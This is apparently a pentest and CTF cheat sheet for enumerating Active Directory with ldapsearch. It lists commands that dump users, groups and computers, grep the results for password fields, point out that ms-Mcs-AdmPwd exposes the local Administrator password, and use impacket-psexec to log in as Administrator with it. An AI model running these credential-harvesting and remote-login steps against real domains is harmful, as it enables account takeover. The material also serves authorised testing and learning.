Query Active Directory (AD) with LDAP.
Does not always work (might be blocked).
Installation
sudo apt install ldap-utilssudo apt show ldap-utilsHelp
man ldapsearchUsage
When option “-h $IP” is not available, use -H with ldap://${IP} instead.
- -x: Use simple authentication instead of SASL
- -b: Use searchbase as the starting point for the search instead of the default
- -D: Distinguised Name to use for authentication (full user name)
- -w: Password used during authentication
- Filters conforms to string representation in RFC 4515
# When ldap://${IP} does not work, try with machine name
# When using machine name, add IP and machine.domain to /etc/hosts
LDAP_URI="ldap://${IP}"
LDAP_URI="ldap://dc01.example.com"
LDAP_URI="ldap://dc01.example.com:389/dc=example,dc=com"
LDAP_URI="ldap://dc01.example.com:389/dc=example,dc=com?givenName,sn,cn?sub?(uid=john.doe)"SEARCHBASE="dc=example,dc=com"
SEARCHBASE="dc=machine,dc=domain"
SEARCHBASE="CN=Domain Admins,CN=Users,dc=example,dc=com"
SEARCHBASE="ou=anonymous,dc=challenge01,dc=someurl,dc=org"# Distinguised Name, used to authenticate
# Full user name or username@domain work
DN="cn=John Smith,cn=Users,dc=example,dc=com"
DN="john@example.com"PASS="MyPasswordToAuthenticate"ldapsearch -H $LDAP_URI -x -b $SEARCHBASE [-D "$DN" -w "$PASS"] [filter [attributes]]ldapsearch <previous_options> "(object_type)=(object_value)" <optional_attributes>List all objects in Active Directory
ldapsearch -H $LDAP_URI -x -b $SEARCHBASE > ldapsearch-all-objects.txtldapsearch -H $LDAP_URI -x -b $SEARCHBASE -D "$DN" -w "$PASS" > ldapsearch-all-objects-authenticated.txtms-Mcs-AdmPwd is the Administrator’s password!
grep -i -E "pass|pwd" ldapsearch-users-authenticated.txtimpacket-psexec -dc-ip $DC_IP ${DOMAIN}/Administrator:${PASS}@${IP}List all objectClass (user, computer, group, etc.)
ldapsearch -H $LDAP_URI -x -b $SEARCHBASE | grep objectClass | sort -uldapsearch -H $LDAP_URI -x -b $SEARCHBASE -D "$DN" -w "$PASS" | grep objectClass | sort -uList users in Active Directory
ldapsearch -H $LDAP_URI -x -b $SEARCHBASE "objectclass=user" > ldapsearch-users.txtldapsearch -H $LDAP_URI -x -b $SEARCHBASE -D "$DN" -w "$PASS" "objectclass=user" > ldapsearch-users-authenticated.txtList users – filter on attributes
ldapsearch -H $LDAP_URI -x -b $SEARCHBASE "objectclass=user" sAMAccountNameldapsearch -H $LDAP_URI -x -b $SEARCHBASE "objectclass=user" sAMAccountName | sort | awk -F "sAMAccountName: " '$2{print $2}' > users.txtldapsearch -H $LDAP_URI -x -b $SEARCHBASE -D "$DN" -w "$PASS" "objectclass=user" sAMAccountName | sort | awk -F "sAMAccountName: " '$2{print $2}' > users-authenticated.txtldapsearch -H $LDAP_URI -x -b $SEARCHBASE "objectclass=user" dn sAMAccountName memberOf *pass*Domain Admins
ldapsearch -H $LDAP_URI -x -b "CN=Domain Admins,CN=Users,${SEARCHBASE}" -D "$DN" -w "$PASS"Authenticated
ldapsearch -H $LDAP_URI -x -b $SEARCHBASE -D "$DN" -w "$PASS" "objectclass=user" dn sAMAccountName memberOf *pass*ldapsearch -H $LDAP_URI -x -b $SEARCHBASE -D "$DN" -w "$PASS" "objectclass=user" dn sAMAccountName memberOf *pass*List computers
ldapsearch -H $LDAP_URI -x -b $SEARCHBASE "objectclass=computer"ldapsearch -H $LDAP_URI -x -b $SEARCHBASE -D "$DN" -w "$PASS" "objectclass=computer"Enumeration – usernames
ldapsearch -H $LDAP_URI -x -b $SEARCHBASE "objectclass=user" sAMAccountNameldapsearch -H $LDAP_URI -x -b $SEARCHBASE -D "$DN" -w "$PASS" "objectclass=user" > ldapsearch-authenticatedConnect to directory with LDAP
Found during a CTF
ldapsearch -x -H $LDAP_URI -b $SEARCHBASE "(objectclass=*)" "*" +